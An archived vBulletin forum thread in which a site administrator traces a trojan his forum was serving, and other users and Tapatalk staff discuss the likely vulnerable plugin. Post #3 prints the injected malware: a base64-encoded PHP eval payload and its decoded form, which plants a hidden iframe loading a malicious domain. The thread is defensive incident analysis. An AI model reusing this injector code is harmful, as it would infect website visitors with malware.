Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions

Reply
 
Thread Tools Display Modes
  #1  
Old 06-24-2010, 03:02 PM
SomeDude-GP SomeDude-GP is offline
 
Join Date: Jun 2009
Posts: 13
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default new 0 day exploit? (bekebu.in / cuzelu.in)

I have noticed in the last few days my VB install has been trying to infect users with a trojan coming from bekebu.in &/or cuzelu.in

http://support.clean-mx.de/clean-mx/...n&submit=query

not sure if this was a new 0 day going around or not, but it may be worth someones time to look into this.



--------------- Added [DATE]1277395487[/DATE] at [TIME]1277395487[/TIME] ---------------

I have blocked out the /16 that those domains are coming from and google safebrowsing doesn't come up with the malware warning anymore.

91.188.0.0/16

http://www.db.ripe.net/whois?form_ty...&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55

http://www.senderbase.org/senderbase...g=91.188.59.55
Reply With Quote
  #2  
Old 06-24-2010, 07:39 PM
ChopSuey ChopSuey is offline
 
Join Date: Jun 2009
Location: Alaska
Posts: 2,140
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

What file is calling that site?
Reply With Quote
  #3  
Old 06-26-2010, 02:27 PM
SomeDude-GP SomeDude-GP is offline
 
Join Date: Jun 2009
Posts: 13
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.

Code:
\r\n@eval(base64_decode(\"aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQplY2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBjb29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYXRlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGltZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYXRlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNvb2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIrZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Iik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9\"));
which resulted in

Code:
if (!isset($_COOKIE['xlov'])) {
$xb = array('MSIE','MyIE','IE','Firefox','Opera','Netscape','Chrome','Safari','Media Center');
$ifrand = mt_rand(0,111);
$domb = "http: // www. fealatoc.co .cc/clo.php";
foreach ($xb as $xbb) {
if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) {
echo <<<HJJ
<script>
function SetCookie(cookieName,cookieContent){
 var cookiePath = '/';
 var expDate=new Date();
 expDate.setTime(expDate.getTime()+372800000)  ;
 var expires=expDate.toGMTString();
 document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; 
}
SetCookie("xlov", "day");
</script>
<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>
HJJ;
break;
 }
 }
}
--------------- Added [DATE]1277566093[/DATE] at [TIME]1277566093[/TIME] ---------------

the url in the script code is broken on purpose

--------------- Added [DATE]1277566152[/DATE] at [TIME]1277566152[/TIME] ---------------

Thanks to the people over at Tapatalk for helping me figure this out. :wink:
Reply With Quote
  #4  
Old 06-26-2010, 02:46 PM
TNCclubman's Avatar
TNCclubman TNCclubman is offline
 
Join Date: Sep 2008
Posts: 690
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

you're running Tapatalk on your vB? or is it just a clean install of vB?
Reply With Quote
  #5  
Old 06-27-2010, 11:00 AM
SomeDude-GP SomeDude-GP is offline
 
Join Date: Jun 2009
Posts: 13
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

We have been using tapatalk for a while now. Last week a few members started getting virii warnings about bekebu.in &/or cuzelu.in. A few days ago, one the admins @ tapatalk contacted us to let us know they had shut us down on their side due to the virii issue and have helped us locate some of this code.

--------------- Added [DATE]1277640262[/DATE] at [TIME]1277640262[/TIME] ---------------

fealatoc . co . cc info:

http://www.db.ripe.net/whois?form_ty...&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7
Reply With Quote
  #6  
Old 06-27-2010, 11:48 AM
SomeDude-GP SomeDude-GP is offline
 
Join Date: Jun 2009
Posts: 13
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Post Thanks 'Hack' got hacked.
Attached Images
File Type: jpg Screenshot1.jpg (78.6 KB, 0 views)
Reply With Quote
  #7  
Old 06-27-2010, 11:49 AM
SomeDude-GP SomeDude-GP is offline
 
Join Date: Jun 2009
Posts: 13
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Also Reported to PT author @ https://vborg.vbsupport.ru/showpost....&postcount=948
Reply With Quote
  #8  
Old 06-27-2010, 11:52 AM
BirdOPrey5's Avatar
BirdOPrey5 BirdOPrey5 is offline
Senior Member
 
Join Date: Jun 2008
Location: New York
Posts: 10,610
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I guess the question is- did having tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have tapatalk installed I'm curious too.
Reply With Quote
  #9  
Old 06-27-2010, 12:17 PM
SomeDude-GP SomeDude-GP is offline
 
Join Date: Jun 2009
Posts: 13
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the tapatalk plugin. I think it's the post thanks `hack` that is vulnerable, but this will need to be tested and confirmed.
Reply With Quote
  #10  
Old 06-27-2010, 12:19 PM
yellowpeter's Avatar
yellowpeter yellowpeter is offline
 
Join Date: Dec 2008
Posts: 599
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I am not sure either, the information are mixed, some forum didn't install Tapatalk also got hacked. But one forum found a mysterious php file are added to the Tapatalk directory that caught our attention. So we went ahead to check our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).

We have sent out email to all forum owners to upgrade so I hope to keep this infection to the minimum.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 09:19 AM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.19627 seconds
  • Memory Usage 2,269KB
  • Queries Executed 12 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (2)bbcode_code
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (1)postbit_attachment
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • postbit_attachment
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete